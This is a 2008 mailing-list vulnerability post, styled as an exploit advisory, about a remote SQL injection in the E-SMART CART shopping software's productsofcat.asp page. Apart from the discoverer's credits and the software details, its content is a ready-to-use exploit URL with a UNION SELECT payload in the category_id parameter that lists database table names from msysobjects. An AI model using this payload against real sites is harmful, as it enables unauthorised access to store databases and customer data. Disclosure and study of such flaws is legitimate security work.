E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability

sys-project Mon, 16 Jun 2008 08:22:19 -0700

[+] Info:


[~] Bug found by Jose Luis Góngora Fernández (JosS)

[~] sys-project[at]hotmail.com

[~] http://www.spanish-hackers.com/

[~] Spanish Hackers Team - [SHT]

[~] EspSeC & Hack0wn!.


[~] Software: E-SMART CART (payment)

[~] HomePage: http://www.preproject.com/

[~] Exploit: Remote SQL Injection [High]

[~] Vuln file: productsofcat.asp


[~] /store/productsofcat.asp?p=1&category_id=[SQL]


[+] Exploit:


[~] http://localhost/PATH/store/productsofcat.asp?p=1&category_id=[SQL]

[~] 22+and+1=2+union+all+select+1,name,3,0+from+msysobjects


* In memory of rgod

E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability

Reply via email to